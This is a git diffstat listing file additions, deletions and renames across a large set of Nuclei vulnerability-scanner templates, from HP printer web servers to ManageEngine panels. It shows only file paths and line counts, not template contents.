.../hp-laserjet-flow-mfp-m527-webserver.yaml | 6 +- .../Other/hp-laserjet-m605-webserver.yaml | 6 +- .../Other/hp-laserjet-m609-webserver.yaml | 6 +- .../Other/hp-laserjet-mfp-m528-webserver.yaml | 6 +- .../Other/hp-laserjet-mfp-m725-webserver.yaml | 4 - .../Other/hp-laserjet-p4015-webserver.yaml | 6 +- .../Other/hp-laserjet-p4515-webserver.yaml | 6 +- .../Other/hp-media-vault-detect.yaml | 49 +- .../Other/hp-switch-default-login-8036.yaml | 37 + .../Other/hp-switch-default-login.yaml | 29 - .../hpe-system-management-anonymous-8013.yaml | 21 + .../hpe-system-management-anonymous.yaml | 21 - .../Other/hpe-system-management-login.yaml | 54 +- ...l => hrsale-unauthenticated-lfi-8039.yaml} | 0 nuclei-templates/Other/hsort-fileRead.yaml | 3 - .../{hst-fileread.yaml => hst-fileRead.yaml} | 0 
.../Other/htaccess-config-8044.yaml | 26 + nuclei-templates/Other/htaccess-config.yaml | 18 - ...tion.yaml => htpasswd-detection-8046.yaml} | 0 ...> http-missing-security-headers-8058.yaml} | 0 .../{http-raw-multiple.yaml => http-raw.yaml} | 0 nuclei-templates/Other/http-trace.yaml | 3 +- .../Other/http-username-password.yaml | 13 +- ...ts-header.yaml => http-xframe-header.yaml} | 0 nuclei-templates/Other/httpbin-detection.yaml | 3 - ...t.yaml => httpbin-open-redirect-8049.yaml} | 0 .../Other/httpbin-panel-8051.yaml | 21 + nuclei-templates/Other/httpbin-panel.yaml | 25 - nuclei-templates/Other/httpbin-xss-8052.yaml | 33 - nuclei-templates/Other/httpbin-xss-8053.yaml | 15 + ...tpd-config-8055.yaml => httpd-config.yaml} | 0 .../Other/httponly-cookie-detect.yaml | 7 +- .../huawei-HG532e-default-router-login.yaml | 43 - .../Other/huawei-firewall-lfi.yaml | 4 +- .../Other/huawei-hg255s-lfi-8060.yaml | 23 + nuclei-templates/Other/huawei-hg255s-lfi.yaml | 27 - ...awei-hg532e-default-router-login-8064.yaml | 38 + .../Other/huawei-hg532e-panel-8065.yaml | 34 + .../Other/huawei-hg532e-panel.yaml | 30 - nuclei-templates/Other/huawei-hg659-lfi.yaml | 16 +- ...way-8072.yaml => huawei-home-gateway.yaml} | 0 ...75.yaml => huawei-router-auth-bypass.yaml} | 0 ...read.yaml => huayu-Reporter-fileRead.yaml} | 0 ...orter-rce.yaml => huayu-Reporter-rce.yaml} | 0 .../Other/hubspot-takeover-8078.yaml | 18 + nuclei-templates/Other/hubspot-takeover.yaml | 20 - nuclei-templates/Other/hubspot.yaml | 31 + .../Other/hue-default-credential-8080.yaml | 70 - .../Other/hue-default-credential-8081.yaml | 67 + .../Other/hue-personal-wireless-panel.yaml | 5 +- nuclei-templates/Other/hue.yaml | 20 + nuclei-templates/Other/hugo-detect.yaml | 6 +- .../Other/huijietong-cloud-fileread-8082.yaml | 19 + .../Other/huijietong-cloud-fileread-8085.yaml | 23 - .../Other/huiwen-bibliographic-info-leak.yaml | 6 +- .../Other/hybris-administration-console.yaml | 16 +- .../Other/hybris-default-login.yaml | 8 +- 
nuclei-templates/Other/hybris.yaml | 20 + nuclei-templates/Other/hydra-dashboard.yaml | 14 +- .../Other/hydracrypt-malware.yaml | 8 +- .../Other/hypertest-dashboard.yaml | 9 +- nuclei-templates/Other/i-mscp-panel.yaml | 6 +- .../Other/iam-password-policy.yaml | 37 +- .../ibm-advanced-system-management-8090.yaml | 20 + .../Other/ibm-advanced-system-management.yaml | 24 - .../Other/ibm-d2b-database-server.yaml | 75 +- nuclei-templates/Other/ibm-dcec-panel.yaml | 6 +- .../Other/ibm-decision-server-console.yaml | 6 +- .../Other/ibm-friendly-path-exposure-1.yaml | 35 + ...l => ibm-friendly-path-exposure-8092.yaml} | 0 .../Other/ibm-http-server-8097.yaml | 29 - nuclei-templates/Other/ibm-http-server.yaml | 25 + ...t-lfi.yaml => ibm-infoprint-lfi-8105.yaml} | 0 nuclei-templates/Other/ibm-maximo-login.yaml | 13 +- nuclei-templates/Other/ibm-maximo-panel.yaml | 2 - nuclei-templates/Other/ibm-odm-detect.yaml | 2 +- nuclei-templates/Other/ibm-odm-panel.yaml | 6 +- .../Other/ibm-openadmin-panel.yaml | 5 +- .../Other/ibm-security-access-manager.yaml | 3 +- .../Other/ibm-service-assistant.yaml | 4 - ...ect-8122.yaml => ibm-sterling-detect.yaml} | 0 ... 
ibm-storage-default-credential-8123.yaml} | 0 nuclei-templates/Other/ibm-tririga-panel.yaml | 4 - .../Other/ibm-websphere-admin-panel.yaml | 13 +- .../Other/ibm-websphere-ssrf.yaml | 10 +- nuclei-templates/Other/icc-pro-login.yaml | 9 +- .../Other/icecast-server-detect.yaml | 5 +- nuclei-templates/Other/icedid.yaml | 5 +- ....yaml => iceflow-vpn-disclosure-8128.yaml} | 0 .../Other/icewarp-open-redirect.yaml | 5 - .../Other/icewarp-panel-detect.yaml | 13 +- .../Other/icewarp-webclient-rce-8131.yaml | 24 + .../Other/icewarp-webclient-rce.yaml | 28 - .../Other/ictprotege-login-panel.yaml | 18 +- .../idemia-biometrics-default-login-8139.yaml | 39 - .../idemia-biometrics-default-login.yaml | 40 + .../Other/identity-services-engine.yaml | 3 +- ...entityguard-selfservice-entrust-8142.yaml} | 0 ...n-params.yaml => idor-vuln-params(1).yaml} | 0 .../iis-errorpage-detection-all-lang.yaml | 5 +- .../iis-internal-ip-disclosure-8148.yaml | 33 + .../Other/iis-internal-ip-disclosure.yaml | 29 - nuclei-templates/Other/ilch-admin-panel.yaml | 12 +- nuclei-templates/Other/ilias-panel.yaml | 13 +- nuclei-templates/Other/imagify.yaml | 4 +- nuclei-templates/Other/imap-detect.yaml | 61 +- nuclei-templates/Other/immich-panel.yaml | 5 +- nuclei-templates/Other/impresscms-detect.yaml | 6 +- .../Other/impresspages-installer.yaml | 7 +- nuclei-templates/Other/imsanity.yaml | 2 +- .../Other/inactivity-timeout.yaml | 15 +- .../Other/incapptic-connect-panel.yaml | 11 +- .../Other/indegy-sensor-installer.yaml | 7 +- ...ct-8159.yaml => influxdb-detect-8160.yaml} | 0 nuclei-templates/Other/influxdb-panel.yaml | 12 +- .../Other/influxdb-version-detect.yaml | 13 +- nuclei-templates/Other/influxdb-version.yaml | 14 +- .../Other/insecure-cipher-suite-detect.yaml | 5 +- ...l => insecure-firebase-database-8161.yaml} | 0 .../Other/insert-headers-and-footers.yaml | 2 +- ...spur-clusterengine-default-login-8162.yaml | 48 - .../inspur-clusterengine-default-login.yaml | 39 + 
.../Other/inspur-clusterengine-rce.yaml | 17 +- nuclei-templates/Other/instagram.yaml | 39 + .../Other/integrated_management_module.yaml | 23 + ...s-login.yaml => intelbras-login-8163.yaml} | 0 nuclei-templates/Other/intelbras-panel.yaml | 14 +- .../Other/intellian-aptus-panel.yaml | 15 +- .../Other/intelliflash-login-panel.yaml | 8 +- ...erver.yaml => interactsh-server-8165.yaml} | 0 .../Other/interactsoftware-interact.yaml | 5 +- ...-8166.yaml => intercom-takeover-8167.yaml} | 0 nuclei-templates/Other/intercom.yaml | 10 +- nuclei-templates/Other/interlib-fileread.yaml | 14 +- ...e-8177.yaml => internet-service-8178.yaml} | 0 .../Other/interstingExtensions.yaml | 394 +- .../Other/intuitive-custom-post-order.yaml | 2 +- .../Other/iot-vdme-simulator.yaml | 12 +- ...e.yaml => iotawatt-app-exposure-8187.yaml} | 0 .../Other/ipdiva-mediation-panel.yaml | 10 +- .../Other/iplanet-web-server-8191.yaml | 21 + .../Other/iplanet-web-server.yaml | 25 - nuclei-templates/Other/ipstack.yaml | 23 - .../Other/iptime-default-login-8194.yaml | 32 + .../Other/iptime-default-login.yaml | 37 - ...me-router.yaml => iptime-router-8195.yaml} | 0 nuclei-templates/Other/isams-panel.yaml | 5 +- .../Other/ispyconnect-detect.yaml | 5 +- nuclei-templates/Other/issabel-login.yaml | 10 +- ...fi-8199.yaml => issuu-panel-lfi-8200.yaml} | 0 .../Other/istat-panel-detect.yaml | 8 +- .../{api-iterable-445.yaml => iterable.yaml} | 0 nuclei-templates/Other/itop-detect-8201.yaml | 24 - nuclei-templates/Other/itop-detect-8203.yaml | 19 + nuclei-templates/Other/itop-panel-8205.yaml | 27 - nuclei-templates/Other/itop-panel.yaml | 23 + .../Other/ivanti-connect-secure-panel.yaml | 12 +- nuclei-templates/Other/iwp-client.yaml | 2 +- nuclei-templates/Other/ixbusweb-version.yaml | 10 +- .../Other/ixcache-panel-8206.yaml | 28 - nuclei-templates/Other/ixcache-panel.yaml | 24 + .../Other/jamf-blind-xxe-8209.yaml | 50 - nuclei-templates/Other/jamf-blind-xxe.yaml | 46 + .../Other/jamf-log4j-jndi-rce.yaml | 18 +- 
nuclei-templates/Other/jamf-login.yaml | 10 +- nuclei-templates/Other/jamf-panel-8216.yaml | 39 + nuclei-templates/Other/jamf-panel.yaml | 32 - .../Other/jamf-pro-log4j-rce.yaml | 38 +- .../Other/jamf-setup-assistant.yaml | 9 +- nuclei-templates/Other/jaspersoft-detect.yaml | 16 + .../Other/java-melody-exposed-1.yaml | 29 + .../Other/java-melody-exposed-2.yaml | 29 + ...221.yaml => java-melody-exposed-8224.yaml} | 0 .../Other/java-melody-xss-8225.yaml | 7 +- nuclei-templates/Other/java-rmi-detect.yaml | 4 - nuclei-templates/Other/jboss-jbpm-admin.yaml | 17 +- .../Other/jboss-jbpm-default-login.yaml | 16 +- nuclei-templates/Other/jboss-juddi.yaml | 19 +- .../Other/jboss-seam-debug-page-8239.yaml | 22 + .../Other/jboss-seam-debug-page.yaml | 25 - .../Other/jboss-soa-platform.yaml | 17 +- nuclei-templates/Other/jboss-status.yaml | 6 +- nuclei-templates/Other/jboss-web-service.yaml | 7 +- nuclei-templates/Other/jbpm.yaml | 20 + nuclei-templates/Other/jcms-panel.yaml | 13 +- .../Other/jdbc-connection-string.yaml | 2 +- nuclei-templates/Other/jedox-web-panel.yaml | 10 +- .../Other/jeecg-boot-detect-8247.yaml | 24 - .../Other/jeecg-boot-detect-8248.yaml | 29 + .../Other/jeecg-boot-swagger.yaml | 4 +- .../Other/jeesite-default-login.yaml | 28 - ...WMS-fileRead.yaml => jeewms-fileread.yaml} | 0 ...wms-lfi-8254.yaml => jeewms-lfi-8255.yaml} | 0 ...-detect.yaml => jellyfin-detect-8257.yaml} | 0 .../Other/jellyseerr-login-panel.yaml | 5 +- .../cve-2024-23897.yaml => Other/jenk.yaml} | 0 nuclei-templates/Other/jenkins-api-panel.yaml | 6 +- .../Other/jenkins-asyncpeople-8267.yaml | 20 + .../Other/jenkins-asyncpeople.yaml | 20 - .../Other/jenkins-default-8273.yaml | 52 + .../Other/jenkins-default-login.yaml | 51 - ...s-detect.yaml => jenkins-detect-8275.yaml} | 0 .../Other/jenkins-login-detection.yaml | 13 +- .../Other/jenkins-openuser-register.yaml | 5 +- ...ipt-8281.yaml => jenkins-script-8284.yaml} | 0 ...287.yaml => jenkins-stack-trace-8285.yaml} | 0 
nuclei-templates/Other/jenkins-token.yaml | 5 +- nuclei-templates/Other/jenkins-version.yaml | 12 +- ...s.yaml => jetbrains-datasources-8291.yaml} | 0 .../Other/jetbrains-takeover.yaml | 5 +- .../Other/jetbrains-webservers.yaml | 16 +- nuclei-templates/Other/jetpack.yaml | 2 +- nuclei-templates/Other/jexboss-backdoor.yaml | 7 +- .../{jfrog-8303.yaml => jfrog-8304.yaml} | 0 .../jfrog-unauth-build-exposed-8302.yaml | 31 + .../Other/jfrog-unauth-build-exposed.yaml | 35 - nuclei-templates/Other/jhipster-detect.yaml | 5 +- .../Other/jinfornet-jreport-lfi-8307.yaml | 3 +- .../Other/jinher-oa-default-login-8312.yaml | 10 +- nuclei-templates/Other/jira-detect-8316.yaml | 29 - nuclei-templates/Other/jira-detect.yaml | 14 + .../Other/jira-login-default.yaml | 5 +- .../Other/jira-service-desk-signup-8320.yaml | 23 - .../Other/jira-service-desk-signup-8321.yaml | 21 + .../Other/jira-servicedesk-signup.yaml | 18 +- nuclei-templates/Other/jira-setup.yaml | 8 +- .../jira-unauthenticated-dashboards-8323.yaml | 30 - .../jira-unauthenticated-dashboards.yaml | 26 + ...ira-unauthenticated-installed-gadgets.yaml | 4 - ...-unauthenticated-popular-filters-8331.yaml | 2 - .../jira-unauthenticated-popular-filters.yaml | 23 + ...nauthenticated-projectcategories-8332.yaml | 1 - ...> jira-unauthenticated-projects-8335.yaml} | 0 ...=> jira-unauthenticated-screens-8338.yaml} | 0 .../jira-unauthenticated-user-picker.yaml | 15 - nuclei-templates/Other/jira_user_piker.yaml | 16 + nuclei-templates/Other/jitsi-meet.yaml | 19 + .../Other/jkstatus-manager-8347.yaml | 18 + nuclei-templates/Other/jkstatus-manager.yaml | 17 - .../Other/jmx-default-login-8356.yaml | 43 + nuclei-templates/Other/jmx-default-login.yaml | 38 - nuclei-templates/Other/joget-panel.yaml | 12 +- nuclei-templates/Other/jolokia-8367.yaml | 6 +- .../Other/jolokia-info-disclosure.yaml | 144 +- nuclei-templates/Other/jolokia-list.yaml | 13 +- .../Other/jolokia-logback-jndi-rce.yaml | 4 +- .../Other/jolokia-mbean-search-8363.yaml | 35 + 
.../Other/jolokia-mbean-search.yaml | 26 - .../jolokia-unauthenticated-lfi-8364.yaml | 32 + .../Other/jolokia-unauthenticated-lfi.yaml | 31 - .../Other/joomla-com-fabrik-lfi-8370.yaml | 27 - .../Other/joomla-com-fabrik-lfi-8373.yaml | 31 + nuclei-templates/Other/joomla-detect.yaml | 34 +- .../Other/joomla-file-listing.yaml | 6 +- ...taccess.yaml => joomla-htaccess-8382.yaml} | 0 nuclei-templates/Other/joomla-installer.yaml | 5 +- .../Other/joomla-jvehicles-lfi.yaml | 12 +- .../Other/joomla-manifest-file-8386.yaml | 30 - .../Other/joomla-manifest-file-8387.yaml | 25 + ...omla-panel.yaml => joomla-panel-8391.yaml} | 0 .../Other/joomla-workflow-8395.yaml | 13 + nuclei-templates/Other/joomla-workflow.yaml | 13 - nuclei-templates/Other/jorani-panel.yaml | 5 +- nuclei-templates/Other/js-analyse.yaml | 94 +- .../Other/js-endpoint-extractor.yaml | 48 +- nuclei-templates/Other/jsapi-ticket-json.yaml | 5 +- nuclei-templates/Other/jsconfig-json.yaml | 4 +- nuclei-templates/Other/jsf-detect.yaml | 7 +- nuclei-templates/Other/jsherp-boot-panel.yaml | 5 +- nuclei-templates/Other/json-server.yaml | 5 +- nuclei-templates/Other/json.yaml | 31 +- nuclei-templates/Other/jspxcms-detect.yaml | 6 +- nuclei-templates/Other/jumpserver-panel.yaml | 21 +- nuclei-templates/Other/juniper-panel.yaml | 6 +- .../Other/jupyter-ipython-unauth-8402.yaml | 24 - .../Other/jupyter-ipython-unauth-8405.yaml | 21 + .../Other/jupyter-lab-unauth.yaml | 5 +- nuclei-templates/Other/jupyter-notebook.yaml | 30 +- .../Other/jupyter-notebooks-exposed.yaml | 8 +- .../Other/jupyterhub-default-login-8401.yaml | 36 + .../Other/jupyterhub-default-login.yaml | 48 - nuclei-templates/Other/jwt-token-8410.yaml | 18 + nuclei-templates/Other/jwt-token.yaml | 18 - nuclei-templates/Other/kadence-blocks.yaml | 2 +- nuclei-templates/Other/kaes-file-manager.yaml | 9 +- ...kafdrop-xss.yaml => kafdrop-xss-8411.yaml} | 0 .../kafka-center-default-login-8416.yaml | 38 + .../Other/kafka-center-default-login.yaml | 41 - 
.../Other/kafka-center-login.yaml | 3 - ...ect-ui.yaml => kafka-connect-ui-8423.yaml} | 0 .../Other/kafka-consumer-monitor.yaml | 7 +- .../Other/kafka-cruise-control-8427.yaml | 21 - .../Other/kafka-cruise-control.yaml | 18 + .../Other/kafka-manager-panel.yaml | 7 +- .../Other/kafka-manager-unauth.yaml | 5 +- ...toring.yaml => kafka-monitoring-8431.yaml} | 0 .../Other/kafka-topics-ui-8434.yaml | 17 + nuclei-templates/Other/kafka-topics-ui.yaml | 17 - .../Other/kanboard-default-login.yaml | 30 +- nuclei-templates/Other/kanboard-login.yaml | 13 +- .../Other/karaf-default-login.yaml | 6 +- nuclei-templates/Other/karaf.yaml | 20 + ...-lfi.yaml => karel-ip-phone-lfi-8436.yaml} | 0 nuclei-templates/Other/karma-config-js.yaml | 13 +- nuclei-templates/Other/kasm-login-panel.yaml | 5 +- nuclei-templates/Other/kavita-lfi.yaml | 15 +- .../Other/kavita-panel-detect.yaml | 9 +- .../Other/kenesto-login-8445.yaml | 25 - nuclei-templates/Other/kenesto-login.yaml | 22 + .../Other/kentico-login-8446.yaml | 21 + nuclei-templates/Other/kentico-login.yaml | 20 - .../Other/kentico-open-redirect-8448.yaml | 2 +- ...nt.yaml => kerio-connect-client-8452.yaml} | 0 .../Other/kettle-default-login.yaml | 5 +- nuclei-templates/Other/kettle-panel.yaml | 9 +- .../Other/kevinlab-bems-backdoor-8453.yaml | 18 +- .../Other/kevinlab-bems-sqli.yaml | 3 +- ....yaml => kevinlab-device-detect-8462.yaml} | 0 ....yaml => kevinlab-hems-backdoor-8465.yaml} | 0 .../Other/key-cloak-admin-panel.yaml | 14 +- .../Other/keycloak-admin-panel.yaml | 16 +- .../Other/keycloak-openid-config-8477.yaml | 26 + .../Other/keycloak-openid-config.yaml | 29 - nuclei-templates/Other/keycloak-xss-8482.yaml | 26 + nuclei-templates/Other/kfm-login-panel.yaml | 9 +- .../Other/kibana-detect-8484.yaml | 21 + nuclei-templates/Other/kibana-detect.yaml | 24 - nuclei-templates/Other/kibana-panel-8486.yaml | 20 +- .../kingdee-eas-directory-traversal-8489.yaml | 44 + .../kingdee-eas-directory-traversal.yaml | 41 - 
.../Other/kingsoft-v8-default-login.yaml | 8 +- .../Other/kingsoft-v8-file-read.yaml | 11 +- .../Other/kingsoft-webserver-detect.yaml | 6 +- .../Other/kingsoft_antivirus.yaml | 20 + ...akeover.yaml => kinsta-takeover-8493.yaml} | 0 nuclei-templates/Other/kio_firmware.yaml | 20 + nuclei-templates/Other/kirki.yaml | 2 +- .../Other/kiteworks-pcn-panel.yaml | 10 +- nuclei-templates/Other/kiwi_tcms.yaml | 20 + nuclei-templates/Other/kiwitcms-json-rpc.yaml | 39 + .../Other/kiwitcms-login-8496.yaml | 20 +- nuclei-templates/Other/kkfileview-panel.yaml | 9 +- nuclei-templates/Other/kkfileview-ssrf.yaml | 32 +- nuclei-templates/Other/klr300n-panel.yaml | 7 +- .../Other/known-default-account.yaml | 7 +- .../Other/kodak-network-panel.yaml | 7 +- nuclei-templates/Other/koel-panel.yaml | 4 +- ...detect-8500.yaml => kong-detect-8499.yaml} | 0 ...lt-login.yaml => konga-default-login.yaml} | 0 nuclei-templates/Other/konga-panel.yaml | 16 +- .../Other/kopano-webapp-panel.yaml | 6 +- .../Other/kraken-cluster-monitoring.yaml | 12 +- .../Other/kube-api-deployments.yaml | 6 +- .../Other/kube-api-namespaces.yaml | 5 +- .../Other/kube-api-nodes-8507.yaml | 24 +- .../Other/kube-api-pods-8510.yaml | 22 + nuclei-templates/Other/kube-api-pods.yaml | 25 - nuclei-templates/Other/kube-api-roles.yaml | 5 +- .../Other/kube-api-secrets-8512.yaml | 30 + nuclei-templates/Other/kube-api-secrets.yaml | 25 - ...vices.yaml => kube-api-services-8513.yaml} | 0 nuclei-templates/Other/kube-api-version.yaml | 8 +- .../Other/kube-dashboard-detect.yaml | 16 - .../Other/kubeflow-dashboard-unauth.yaml | 4 - .../Other/kubelet-healthz-8518.yaml | 33 - .../Other/kubelet-healthz-8519.yaml | 38 + .../Other/kubelet-metrics-8521.yaml | 30 - nuclei-templates/Other/kubelet-metrics.yaml | 26 + nuclei-templates/Other/kubelet-pods-8522.yaml | 30 + nuclei-templates/Other/kubelet-pods.yaml | 22 - nuclei-templates/Other/kubelet-scan.yaml | 7 +- nuclei-templates/Other/kubelet-stats.yaml | 8 +- 
.../Other/kubernetes-api-detect.yaml | 18 - .../kubernetes-enterprise-manager-8529.yaml | 25 + .../Other/kubernetes-enterprise-manager.yaml | 25 - .../Other/kubernetes-etcd-keys.yaml | 19 +- .../Other/kubernetes-fake-certificate.yaml | 5 +- .../kubernetes-kustomization-disclosure.yaml | 5 - .../Other/kubernetes-metrics-8536.yaml | 29 - .../Other/kubernetes-metrics.yaml | 25 + .../kubernetes-operational-view-detect.yaml | 5 +- .../Other/kubernetes-pods-8542.yaml | 25 + .../Other/kubernetes-pods-8543.yaml | 30 - ...9.yaml => kubernetes-resource-report.yaml} | 0 .../Other/kubernetes-version.yaml | 16 +- .../Other/kubernetes-web-view.yaml | 13 +- .../Other/kubeview-dashboard.yaml | 9 +- .../Other/kyan-credential-exposure.yaml | 6 - ...n-network-credentials-disclosure-8556.yaml | 32 - .../kyan-network-credentials-disclosure.yaml | 26 + .../Other/kyocera-m2035dn-lfi-8558.yaml | 28 + .../Other/kyocera-m2035dn-lfi.yaml | 26 - .../Other/labkey-server-login.yaml | 13 +- ...lacie-panel.yaml => lacie-panel-8561.yaml} | 0 .../Other/lancom-router-panel-8562.yaml | 22 + .../Other/lancom-router-panel.yaml | 18 - nuclei-templates/Other/landesk-csa.yaml | 5 +- nuclei-templates/Other/landesk-ma.yaml | 5 +- .../landfill-remote-monitoring-control.yaml | 26 + .../Other/landingi-takeover-8566.yaml | 17 + nuclei-templates/Other/landingi-takeover.yaml | 20 - .../Other/landray-oa-datajson-rce.yaml | 28 +- .../Other/landray-oa-erp-data-rce.yaml | 30 +- ...571.yaml => landray-oa-fileread-8569.yaml} | 0 ...andray-oa-sysSearchMain-editParam-rce.yaml | 22 +- ...-login.yaml => lansweeper-login-8573.yaml} | 0 .../Other/lantronix-webmanager-panel.yaml | 9 +- ...d.yaml => laravel-debug-enabled-8577.yaml} | 0 .../Other/laravel-debug-mode-405.yaml | 60 +- nuclei-templates/Other/laravel-env-8581.yaml | 17 + nuclei-templates/Other/laravel-env.yaml | 40 - .../Other/laravel-filemanager-8590.yaml | 24 - .../Other/laravel-filemanager-8591.yaml | 32 + .../Other/laravel-filemanager-lfi-8587.yaml | 1 + 
.../Other/laravel-ignition-xss-8592.yaml | 43 + .../Other/laravel-ignition-xss.yaml | 30 - .../Other/laravel-log-file-8597.yaml | 32 + .../Other/laravel-log-file-8598.yaml | 34 - .../Other/laravel-telescope-8601.yaml | 24 + nuclei-templates/Other/laravel-telescope.yaml | 21 - .../Other/larvel-debugbar-enabled.yaml | 2 +- .../Other/launchrock-takeover.yaml | 5 +- nuclei-templates/Other/lazy-file-8607.yaml | 17 + nuclei-templates/Other/lazy-file.yaml | 21 - .../Other/ldap-account-manager-panel.yaml | 9 +- .../Other/ldap-anonymous-login.yaml | 9 +- nuclei-templates/Other/ldap-wp-login-xss.yaml | 5 +- nuclei-templates/Other/leadin.yaml | 2 +- .../Other/leadpages-takeover.yaml | 6 +- nuclei-templates/Other/leira-cron-jobs.yaml | 59 + nuclei-templates/Other/leira-roles.yaml | 59 + nuclei-templates/Other/lemlist-takeover.yaml | 3 +- nuclei-templates/Other/lenovo-fp-panel.yaml | 15 +- .../Other/lenovo-thinkserver-panel.yaml | 8 +- .../Other/leostream-detection.yaml | 24 - nuclei-templates/Other/leostream-panel.yaml | 22 + nuclei-templates/Other/lfi-keyed.yaml | 118 - nuclei-templates/Other/lfi-linux-fuzz.yaml | 98 + nuclei-templates/Other/lfi.yaml | 24 - nuclei-templates/Other/lfr_express.yaml | 40 + nuclei-templates/Other/librenms-login.yaml | 13 +- nuclei-templates/Other/librephotos-panel.yaml | 5 +- nuclei-templates/Other/librespeed-panel.yaml | 5 +- .../Other/libvirt-exporter-metrics.yaml | 7 +- nuclei-templates/Other/liferay-api.yaml | 9 +- nuclei-templates/Other/liferay-axis.yaml | 5 +- nuclei-templates/Other/liferay-jsonws.yaml | 7 +- .../Other/liferay-portal-detect-8625.yaml | 22 + .../Other/liferay-portal-detect-8626.yaml | 23 - nuclei-templates/Other/liferay-portal.yaml | 12 +- .../Other/liferay-resource-leak.yaml | 5 +- nuclei-templates/Other/lighttpd-default.yaml | 19 + .../Other/limesurvey-installer.yaml | 5 +- .../Other/limit-login-attempts-reloaded.yaml | 2 +- .../Other/limit-login-attempts.yaml | 2 +- ...nkedin-id.yaml => linkedin-client-id.yaml} | 0 
...ect-8632.yaml => linkerd-detect-8633.yaml} | 0 nuclei-templates/Other/linkerd-panel.yaml | 12 +- .../Other/linkerd-ssrf-detect-8637.yaml | 21 - .../Other/linkerd-ssrf-detect.yaml | 19 + nuclei-templates/Other/linkerd-ssrf.yaml | 7 +- .../Other/linksys-wifi-login-8644.yaml | 28 - .../Other/linksys-wifi-login.yaml | 23 + .../Other/linktap-gateway-exposure.yaml | 5 +- nuclei-templates/Other/linshare-panel.yaml | 6 +- nuclei-templates/Other/linux-lfi-fuzz.yaml | 98 - nuclei-templates/Other/linux-lfi-fuzzing.yaml | 51 + .../Other/liquibase-spring-boot.yaml | 2 - nuclei-templates/Other/litespeed-cache.yaml | 2 +- .../Other/livehelperchat-admin-panel.yaml | 14 +- .../Other/livehelperchat-detect.yaml | 38 +- .../Other/liveview-axis-camera-8647.yaml | 36 + .../Other/liveview-axis-camera.yaml | 27 - nuclei-templates/Other/lmszai-installer.yaml | 5 +- nuclei-templates/Other/loancms-sqli.yaml | 12 +- .../Other/locklizard-webviewer-panel.yaml | 9 +- nuclei-templates/Other/lockself-panel.yaml | 4 +- nuclei-templates/Other/loco-translate.yaml | 2 +- nuclei-templates/Other/locust-exposure.yaml | 13 +- nuclei-templates/Other/log4j-code42-rce.yaml | 5 +- nuclei-templates/Other/log4j-detect.yaml | 5 - ...d-poc.yaml => log4j-fuzz-head-poc-v1.yaml} | 0 .../Other/log4j-fuzz-head-poc-v2.yaml | 217 - ...{log4jshell-detect.yaml => log4j-url.yaml} | 0 nuclei-templates/Other/log4shell.yaml | 125 +- nuclei-templates/Other/loganalyzer.yaml | 37 + nuclei-templates/Other/logging-enable.yaml | 15 +- nuclei-templates/Other/loginizer.yaml | 2 +- nuclei-templates/Other/loginpress.yaml | 4 +- .../{logins (copy 1).yaml => logins.yaml} | 0 .../Other/logitech-harmony-portal.yaml | 9 +- nuclei-templates/Other/logstash.yaml | 20 + nuclei-templates/Other/lomnido-panel.yaml | 4 +- nuclei-templates/Other/looker-panel.yaml | 9 +- nuclei-templates/Other/loqate-api-key.yaml | 6 +- .../{api-loqate-453.yaml => loqate.yaml} | 0 .../Other/lotus-core-cms-lfi.yaml | 5 - .../Other/lotus-domino-version-8654.yaml | 
34 - .../Other/lotus-domino-version.yaml | 32 + nuclei-templates/Other/lotuscms-rce-8653.yaml | 34 + nuclei-templates/Other/lotuscms-rce.yaml | 25 - nuclei-templates/Other/loxone-panel.yaml | 9 +- nuclei-templates/Other/loytec-device.yaml | 7 +- .../Other/lucas-string-replace.yaml | 59 + nuclei-templates/Other/lucee-detect.yaml | 5 +- nuclei-templates/Other/lucee-login-8665.yaml | 25 + nuclei-templates/Other/lucee-login.yaml | 21 - .../Other/lucee-stack-trace-8668.yaml | 21 + .../Other/lucee-stack-trace-8669.yaml | 25 - nuclei-templates/Other/lucy-admin-panel.yaml | 6 +- .../luftguitar-arbitrary-file-upload.yaml | 5 - .../Other/lutron-default-login.yaml | 16 +- ...aml => lutron-iot-default-login-8675.yaml} | 0 .../Other/lvm-exporter-metrics.yaml | 9 +- .../Other/lvmeng-uts-disclosure.yaml | 3 - nuclei-templates/Other/lychee-installer.yaml | 5 +- nuclei-templates/Other/mac-c2-jarm.yaml | 5 +- .../Other/maccmsv10-backdoor-8683.yaml | 34 + .../Other/maccmsv10-backdoor.yaml | 25 - nuclei-templates/Other/mach-proweb-login.yaml | 9 +- .../Other/machform-admin-panel.yaml | 14 +- .../Other/macos-bella-malware.yaml | 7 +- nuclei-templates/Other/macshell-c2-jarm.yaml | 5 +- .../Other/maestro-login-panel.yaml | 10 +- .../Other/mag-dashboard-panel.yaml | 10 +- ...i.yaml => magento-2-exposed-api-8688.yaml} | 0 .../Other/magento-admin-panel-8693.yaml | 25 - .../Other/magento-admin-panel.yaml | 21 + ...eleak.yaml => magento-cacheleak-8699.yaml} | 0 .../Other/magento-config-8703.yaml | 28 + .../Other/magento-config-disclosure.yaml | 13 +- nuclei-templates/Other/magento-config.yaml | 24 - .../Other/magento-downloader-panel.yaml | 17 +- nuclei-templates/Other/magento-installer.yaml | 5 +- .../magento-unprotected-dev-files-8708.yaml | 32 + .../magento-unprotected-dev-files-8709.yaml | 35 - .../Other/magicflow-lfi-8710.yaml | 26 - .../Other/magicflow-lfi-8713.yaml | 22 + nuclei-templates/Other/magnolia-panel.yaml | 6 +- nuclei-templates/Other/magnolia_cms.yaml | 20 + 
nuclei-templates/Other/maian-cart-detect.yaml | 5 +- .../Other/maian-cart-preauth-rce.yaml | 14 +- nuclei-templates/Other/mailchimp-api(1).yaml | 13 + .../Other/mailchimp-api-key-8722.yaml | 18 - .../Other/mailchimp-api-key-8724.yaml | 15 + .../Other/mailchimp-for-woocommerce.yaml | 2 +- nuclei-templates/Other/mailchimp-for-wp.yaml | 2 +- nuclei-templates/Other/mailchimp.yaml | 21 + nuclei-templates/Other/mailgun-api.yaml | 16 - nuclei-templates/Other/mailhog-panel.yaml | 9 +- nuclei-templates/Other/mailpoet.yaml | 6 +- nuclei-templates/Other/mailwatch-login.yaml | 10 +- .../Other/maintainer-account.yaml | 13 +- nuclei-templates/Other/maintenance.yaml | 2 +- nuclei-templates/Other/mainwp-child.yaml | 6 +- nuclei-templates/Other/malcare-security.yaml | 2 +- nuclei-templates/Other/maltrail-panel.yaml | 5 +- ...it.yaml => manageengine-adaudit-8730.yaml} | 0 .../Other/manageengine-adselfservice.yaml | 8 +- .../Other/manageengine-analytics.yaml | 6 +- .../manageengine-apex-helpdesk-8748.yaml | 20 + 